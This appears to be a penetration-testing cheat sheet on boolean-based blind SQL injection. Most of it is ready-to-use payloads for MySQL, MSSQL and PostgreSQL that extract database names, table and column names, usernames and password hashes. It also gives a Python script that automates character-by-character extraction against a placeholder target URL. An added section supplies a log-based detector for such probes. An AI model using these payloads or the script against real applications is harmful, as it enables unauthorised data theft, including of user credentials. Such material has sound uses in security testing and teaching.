Overview

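The application shows no query output and no database errors, but it responds differently (content, status code, redirect) depending on whether an injected condition is true or false. That difference acts as a yes/no oracle, so data is extracted character by character.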

Detect

' AND 1=1-- -          → Normal response (TRUE)
' AND 1=2-- -          → Different response (FALSE)
If responses differ → boolean blind injectable.

Extract Data — SUBSTRING

Database Name Length

' AND LENGTH(database())=1-- -
' AND LENGTH(database())=2-- -
...
' AND LENGTH(database())=5-- -     → TRUE (length is 5)

Database Name Character by Character

' AND SUBSTRING(database(),1,1)='a'-- -
' AND SUBSTRING(database(),1,1)='b'-- -
...
' AND SUBSTRING(database(),1,1)='t'-- -    → TRUE (first char is 't')
' AND SUBSTRING(database(),2,1)='e'-- -    → TRUE (second char is 'e')
' AND ASCII(SUBSTRING(database(),1,1))>96-- -     → TRUE (> 'a')
' AND ASCII(SUBSTRING(database(),1,1))>112-- -    → TRUE (> 'p')
' AND ASCII(SUBSTRING(database(),1,1))>120-- -    → FALSE
' AND ASCII(SUBSTRING(database(),1,1))>116-- -    → TRUE
' AND ASCII(SUBSTRING(database(),1,1))=116-- -    → TRUE (char = 't')
Binary search on the ASCII value, as in the last five probes, needs ~7 requests per character instead of ~36 when guessing one character at a time.

Extract Tables

Count Tables

' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())=5-- -

Table Name

' AND SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1),1,1)='u'-- -

Extract Columns

' AND SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 0,1),1,1)='i'-- -

Extract Data

' AND SUBSTRING((SELECT username FROM users LIMIT 0,1),1,1)='a'-- -
' AND SUBSTRING((SELECT password FROM users LIMIT 0,1),1,1)='$'-- -

MSSQL Syntax

' AND SUBSTRING((SELECT DB_NAME()),1,1)='m'-- -
' AND ASCII(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'),1,1))>100-- -

PostgreSQL Syntax

' AND SUBSTRING((SELECT current_database()),1,1)='p'-- -
' AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='public' LIMIT 1),1,1))>100-- -

Automation Script (Python)

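import requests

url = "http://TARGET/page"
result = ""

for pos in range(1, 50):
    # Binary search over the character code at this position.
    # Starting at 0 lets an empty SUBSTRING (ASCII('') = 0 in MySQL) mark the end of the string.
    low, high = 0, 126
    while low <= high:
        mid = (low + high) // 2
        payload = f"' AND ASCII(SUBSTRING(database(),{pos},1))>{mid}-- -"
        r = requests.get(url, params={"id": payload}, timeout=10)
        # TRUE condition: the response contains the known-good marker.
        if "expected_true_content" in r.text:
            low = mid + 1
        else:
            high = mid - 1
    # low == 0: past the end of the string; low > 126: outside the searched range.
    if low == 0 or low > 126:
        break
    result += chr(low)
    print(f"[+] {result}")

print(f"Result: {result}")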
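
Seen from the defender's side, the extraction procedure on this page leaves a recognisable trail in access logs: one client sending many `SUBSTRING(...,POS,1)` comparisons against the same expression. The detector below is an added example, not part of the original page; the combined-log line format, the `find_extraction` name, the threshold of 5 and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, quote, urlsplit

# Probe shapes from this page: [ASCII(]SUBSTRING(<expr>,<pos>,1)[)] then >N, =N or ='x'.
PROBE = re.compile(
    r"SUBSTR(?:ING)?\s*\((?P<expr>.+),\s*(?P<pos>\d+)\s*,\s*1\s*\)\s*\)?"
    r"\s*(?P<op>[<>=])\s*(?P<val>\d+|'.')",
    re.IGNORECASE,
)
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')
MIN_PROBES = 5  # assumed alert threshold: distinct probes against one expression


def find_extraction(lines, min_probes=MIN_PROBES):
    """Return {client_ip: {probed_expr: sorted positions}} for clients over the threshold."""
    seen = defaultdict(set)  # (ip, expr) -> {(pos, op, val)}
    for line in lines:
        req = REQUEST.match(line)
        if not req:
            continue
        # parse_qsl URL-decodes each parameter value before the pattern is applied.
        for _name, value in parse_qsl(urlsplit(req["target"]).query):
            hit = PROBE.search(value)
            if hit:
                key = (req["ip"], hit["expr"].strip().lower())
                seen[key].add((int(hit["pos"]), hit["op"], hit["val"]))
    alerts = defaultdict(dict)
    for (ip, expr), probes in seen.items():
        if len(probes) >= min_probes:
            alerts[ip][expr] = sorted({pos for pos, _op, _val in probes})
    return dict(alerts)


# Constructed sample log (combined-log style); addresses are documentation ranges.
_probes = [f"' AND ASCII(SUBSTRING(database(),1,1))>{n}-- -" for n in (96, 112, 120, 116)]
_probes += ["' AND ASCII(SUBSTRING(database(),1,1))=116-- -",
            "' AND ASCII(SUBSTRING(database(),2,1))>96-- -"]
SAMPLE_LOG = [f'203.0.113.7 - - [01/Jan/2025:10:00:00 +0000] "GET /page?id={quote(p)} HTTP/1.1" 200 512'
              for p in _probes]
SAMPLE_LOG += ['198.51.100.4 - - [01/Jan/2025:10:00:01 +0000] "GET /page?id=42 HTTP/1.1" 200 512',
               '198.51.100.4 - - [01/Jan/2025:10:00:02 +0000] "GET /search?q=substring+function HTTP/1.1" 200 90']

if __name__ == "__main__":
    print(find_extraction(SAMPLE_LOG))
```

Probes sent in POST bodies do not appear in a standard access log, so the same matching has to run on WAF or application-level request logging to cover them.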

Quick Reference

| Step | Payload |
| --- | --- |
| Detect | `' AND 1=1-- -` vs `' AND 1=2-- -` |
| Length | `' AND LENGTH(database())=N-- -` |
| Char by char | `' AND SUBSTRING(database(),POS,1)='x'-- -` |
| Binary search | `' AND ASCII(SUBSTRING(database(),POS,1))>N-- -` |
